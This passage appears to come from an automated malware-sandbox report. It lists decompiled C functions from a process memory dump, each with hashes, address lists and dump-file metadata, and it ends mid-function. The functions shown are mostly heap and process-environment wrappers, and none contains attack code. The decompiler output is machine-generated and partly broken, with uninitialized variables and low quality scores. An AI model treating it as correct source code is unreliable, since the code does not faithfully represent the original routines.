Opcode ID: a98fa1ad1fa302f96c91bfbb1e3fb33971373c80dfd3b4e6eccafb086d75a8d9
Instruction ID: cfad8d7226373ffcd96dbfa4eec3939e5bf97855812ad5c2845c32dee351b3e1
Opcode Fuzzy Hash: a98fa1ad1fa302f96c91bfbb1e3fb33971373c80dfd3b4e6eccafb086d75a8d9
Instruction Fuzzy Hash: 9AF0BEB8A05144AADF0AAB68C940B7ABBB1AF14358F540656E853AB160F724F801CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 04AB4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AB4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04B888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04ADC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4a91030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x04ab4f2e
0x04ab4f34
0x04ab4f38
0x04b10b85
0x04b10b85
0x04b10b89
0x04b10b9a
0x04b10b9a
0x04b10b9f
0x00000000
0x04b10b9f
0x04b10b94
0x04b10b98
0x00000000
0x00000000
0x00000000
0x04b10b98
0x04ab4f3e
0x04ab4f48
0x00000000
0x04ab4f6e
0x00000000
0x04ab4f70

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b44426e12bb68cf0846ea267b8714058888340b2e38e3bdbd544fd85d16722b
Instruction ID: 2b655dd8ec27059058e3df7f1043e9a2df3a9a60ebafc80a8860f63f2b963c37
Opcode Fuzzy Hash: 0b44426e12bb68cf0846ea267b8714058888340b2e38e3bdbd544fd85d16722b
Instruction Fuzzy Hash: 2FF0BE725296949FE761EB28C140F23B7E8EB08BB8F9444A6D40687D35C724FC80C680

Uniqueness

Uniqueness Score: -1.00%

Function 04B88B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04B88B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4bad360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04AD7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04AFB640(E04AF9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04b88b67
0x04b88b6f
0x04b88b72
0x04b88b7d
0x04b88b8f
0x04b88b7f
0x04b88b88
0x04b88b88
0x04b88b9a
0x04b88b9b
0x04b88b9d
0x04b88ba2
0x04b88bb5

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b908dbfd9032b8da5fd63a145918ad7a9e3c451806db4be64efbee7a129d129b
Instruction ID: 2b4baebdd825c1349eb6c64eb1d582bbe56f5fca0cd9712c39fea8e04d463b75
Opcode Fuzzy Hash: b908dbfd9032b8da5fd63a145918ad7a9e3c451806db4be64efbee7a129d129b
Instruction Fuzzy Hash: 62F089B0A142589BDB14FBA4DA06E7F73B8EF44304F440499BA05DB380FA34E900C794

Uniqueness

Uniqueness Score: -1.00%

Function 04AEA44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AEA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4ba7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04AFFA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x04aea44b
0x04aea453
0x04aea472
0x04aea476
0x00000000
0x04aea493
0x04aea47a
0x04aea47f
0x04aea486
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59bb57a065dfd56c51ac09a2dc228e55aeaa7d16260f2294ba4c9a01533595e4
Instruction ID: c495714567a65f9c9e267cb1e7df91e4b6c4947cd1fdb5f985e91389f4d29adf
Opcode Fuzzy Hash: 59bb57a065dfd56c51ac09a2dc228e55aeaa7d16260f2294ba4c9a01533595e4
Instruction Fuzzy Hash: D2E09272A01421ABD2125B59AC00F66B3ADEBD4655F0A8035F505C7210DA28ED11C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 04ABF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04ABF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04AEF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04AD4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x04abf35d
0x04abf361
0x04abf367
0x04abf372
0x04abf38c
0x04abf38c
0x04abf394

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: a48bf6943bab56e9e52cac054c9cf85a42b4e9d08eb99d4ba94894ee16c6408e
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 83E0DF32A41218BFDB31AAD9DE05FEABFACEB48B60F040195B908D7150D571AE00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 04ACFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ACFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4a911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04B888F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04AD0050(_t14);
				}
			}

0x04acff66
0x04acff6b
0x00000000
0x04acff8f
0x00000000
0x04acff8f

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7696e6695d946dfca2073f0b2bbb40f60044b6ef1139a6771d2357872a161c77
Instruction ID: dcc1b262fe2959f71e74c3dcc30cec812032e37d9efc050defe463f2385a881d
Opcode Fuzzy Hash: 7696e6695d946dfca2073f0b2bbb40f60044b6ef1139a6771d2357872a161c77
Instruction Fuzzy Hash: 2EE0DFB0209204AFEB75EB51D140F2937AADB42729F19805DF00A4B1C1C621FA80C28A

Uniqueness

Uniqueness Score: -1.00%

Function 04B441E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04B441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4b908f0);
				_t5 = E04B0D08C(__ebx, __edi, __esi);
				if( *0x4ba87ec == 0) {
					E04ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4ba87ec == 0) {
						 *0x4ba87f0 = 0x4ba87ec;
						 *0x4ba87ec = 0x4ba87ec;
						 *0x4ba87e8 = 0x4ba87e4;
						 *0x4ba87e4 = 0x4ba87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04B44248();
				}
				return E04B0D0D1(_t5);
			}

0x04b441e8
0x04b441ea
0x04b441ef
0x04b441fb
0x04b44206
0x04b4420b
0x04b44216
0x04b4421d
0x04b44222
0x04b4422c
0x04b44231
0x04b44231
0x04b44236
0x04b4423d
0x04b4423d
0x04b44247

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b546c75a496e7a7cf787efb23eb51d1adac46810237fb9cef43a45576e92837f
Instruction ID: fb5fdcb99d1dc8761097862780925e72f84337af9add1f61c0cbf56bc411d1fb
Opcode Fuzzy Hash: b546c75a496e7a7cf787efb23eb51d1adac46810237fb9cef43a45576e92837f
Instruction Fuzzy Hash: 49F01575D20700DFEBA0FFAAA50271436A4F784319F1081AA810487A84D73869A4DF22

Uniqueness

Uniqueness Score: -1.00%

Function 04B6D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B6D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04ABE8B0(__ecx, _a4, 0xfff);
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x04b6d38a
0x04b6d39b
0x04b6d3b1
0x00000000
0x04b6d3b6
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 208d27cc904cc1897d4e379002645a8327cc3270918a943e95bc62eb0f363187
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: F4E0C231380604BBEB225E48CD00FA9BB1ADB507A4F104031FE4A5A690C67ABC91EAC4

Uniqueness

Uniqueness Score: -1.00%

Function 04AEA185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AEA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4ba67e4 >= 0xa) {
					if(_t5 < 0x4ba6800 || _t5 >= 0x4ba6900) {
						return L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04AD0010(0x4ba67e0, _t5);
				}
			}

0x04aea190
0x04aea1a6
0x04aea1c2
0x00000000
0x00000000
0x00000000
0x04aea192
0x04aea192
0x04aea19f
0x04aea19f

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed5eff2e575634c0563ffb1610e17fd4f517a980bb9c078647f4f0253283b647
Instruction ID: bc34e9d4c10301a872acfe57b856b5ca77c369e72db9b39c71324ab0fbb0f467
Opcode Fuzzy Hash: ed5eff2e575634c0563ffb1610e17fd4f517a980bb9c078647f4f0253283b647
Instruction Fuzzy Hash: 5AD02BE35360006AF72C5702AD14B352312E78470CF354C4DF1674B590D970FCF0810A

Uniqueness

Uniqueness Score: -1.00%

Function 04AE16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AE16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04AE1710(0x4ba67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04AD4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x04ae16e8
0x04ae16ef
0x04ae16f3
0x04ae16fe
0x00000000
0x04ae1700
0x04ae170d
0x04ae170d
0x04ae16f2
0x04ae16f2
0x04ae16f2
0x04ae16f2

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e6a44f1b0bd035b25218ae1f256228383b83c3f0653b0ca01409728656098b
Instruction ID: 3a676d81d95716baef8da20275bb1c4e1821d244c460271d417941c17cc5e743
Opcode Fuzzy Hash: e1e6a44f1b0bd035b25218ae1f256228383b83c3f0653b0ca01409728656098b
Instruction Fuzzy Hash: 95D0A77120010092FA2D5F129D44B343251EB84B89F38045CF127594D0CFB0FCA2E488

Uniqueness

Uniqueness Score: -1.00%

Function 04B353CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B353CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04ACEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x04b353ca
0x04b353ce
0x04b353d9
0x04b353de
0x04b353e1
0x04b353e1
0x04b353e6
0x04b353f3
0x00000000
0x04b353f8
0x04b353fb

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: e410adbf1ef1d7d63859768a13f8c00e43f1cfda61dd3ccd645f0ea4797463b9
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 1DE08C72A00680ABCF22DB49CA50F5EB7F5FB44B00F140448A0095B620C634BC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 04AE35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AE35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04ACEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x04ae35a1
0x04ae35a1
0x04ae35a5
0x04ae35ab
0x04ae35ab
0x04ae35b5
0x00000000
0x04ae35c1
0x04ae35b7

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 5f50f35a8d823d99f3d6b9759af175c0aada39552ee09a151aed4281f9f79d9d
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 23D0C931651184DEEF51AB51C21877977B2BB08318F582069985607A52C33A6A5AD721

Uniqueness

Uniqueness Score: -1.00%

Function 04ACAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ACAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x04acaab6
0x04acaabb
0x04b1a442
0x00000000
0x04b1a448
0x04b1a454
0x04b1a454
0x04acaac1
0x04acaac1
0x04acaac6
0x04acaac6

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 26cbec969012f01c4d3fdcb853cdb2f1a26b5c2da2e1cbd614c682cb813030bb
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: E7D0E935352990CFD756DF1DC554B1573A4FB44B44FC504D4E541CBB61E62DE944CA00

Uniqueness

Uniqueness Score: -1.00%

Function 04B3A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B3A537(intOrPtr _a4, intOrPtr _a8) {

				return L04AD8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x04b3a553

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 612669b832625c01c05e7e88a9673d2714b517426ce1e6733bce043c95d88aff
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 61C08C33080248BBCB127F81CD00F067F2AFB94B60F008014FA180B570CA3AE970EB84

Uniqueness

Uniqueness Score: -1.00%

Function 04ABDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ABDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04AD4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x04abdb4d
0x04abdb54
0x04abdb5f
0x04abdb56
0x04abdb56
0x04abdb5c
0x04abdb5c

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 4504dcafe08ecbf458c1c18f47eb6da2a4fc6a0a8f5aa52a1a73c16743ab7c2a
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: B8C08C30280A00AAEB221F20CE01B4076A4BB10B09F4404A06302DA0F0DB78E801EA00

Uniqueness

Uniqueness Score: -1.00%

Function 04ABAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04ABAD30(intOrPtr _a4) {

				return L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04abad49

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: b5ce42d1f8f50f50bbadbc8fe095803951f98330ea2ed1cce2d993d3e77df440
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: E1C02B330C0248BBC7126F45CE00F01BF2DE790B60F000020F6040B671C932FC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 04AC76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AC76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x04ac76e4
0x00000000
0x04ac76f8
0x04ac76fd

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: dcc036f4e5e78c78acb7dd2e938c219489b3a2974f79b50e91780970f584461d
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: DFC08CB81411815AEB2A6B08CE22B203650AB08708F88099CAA02094A1C368B802CA08

Uniqueness

Uniqueness Score: -1.00%

Function 04AE36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AE36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04AD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x04ae36d2
0x04ae36e8
0x04ae36d4
0x04ae36e5
0x04ae36e5

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 49c460d01fdfb86be5d955cfb64e171b9b0cb1d00574e379185a88df0fa91e88
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 75C02B70150440FBEB151F30CE40F25B254FB00A21F64035472324A4F0D538BC00D600

Uniqueness

Uniqueness Score: -1.00%

Function 04AD3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AD3A1C(intOrPtr _a4) {
				void* _t5;

				return L04AD4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04ad3a35

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 24b7c13d8206518fe5c6e3ee896835fc9d65d7c9412cadbc6b0864560b5c0662
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: C0C08C32080248BBC7126E41DD00F01BB29E794B60F000020B6050A5608532EC60D988

Uniqueness

Uniqueness Score: -1.00%

Function 04AD7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AD7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x04ad7d56
0x04ad7d5b
0x04ad7d60
0x04ad7d5d
0x04ad7d5d
0x04ad7d5d

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 4bd3da23629c0765b1543e297a8af994369c8f014dde4c8a953beb4f1edc2ece
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 3DB092383019408FCF1ADF18C080B1533E4BB45A40B8400D4E402CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 04AE2ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04AE2ACB() {
				void* _t5;

				return E04ACEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x04ae2adc

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: cf491bc8ef326551d4e6db4f00d1e36a7468f58d743382d293308b3545fc726e
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 6EB01232D10440CFCF42EF40C710B2A7331FB00750F058494900127930C228BC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04B4FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
